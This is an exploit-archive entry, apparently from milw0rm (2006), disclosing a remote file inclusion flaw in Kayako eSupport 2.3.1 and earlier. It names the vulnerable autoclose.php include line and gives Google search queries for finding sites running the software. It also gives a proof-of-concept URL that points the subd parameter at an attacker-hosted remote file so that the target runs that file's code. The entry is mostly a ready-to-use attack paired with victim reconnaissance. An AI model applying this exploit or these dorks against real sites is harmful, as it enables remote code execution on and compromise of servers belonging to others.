Script: Kayako eSupport <= 2.3.1 Vendor: Kayako (www.kayako.com) Discovered: beford Comments: It seems like the vendor silently fixed the issue in the current version (more like since v2.3.5) withouth warning users of previous versions, noobs. Requires that "register_globals" is enabled. Vulnerable File: esupport/admin/autoclose.php [code] require_once $subd . "functions.php"; [/code] Not-leet-enough: "Powered By Kayako eSupport" http://www.google.com/search?q=%22Helpdesk+Powered+by+Kayako+eSupport+v2.3.1%22 http://www.google.com/search?q=%22Helpdesk+Powered+by+Kayako+eSupport+v2.2%22 POC: http://omghax.com/esupport/admin/autoclose.php?subd=http://remotefile/? # milw0rm.com [2006-08-02]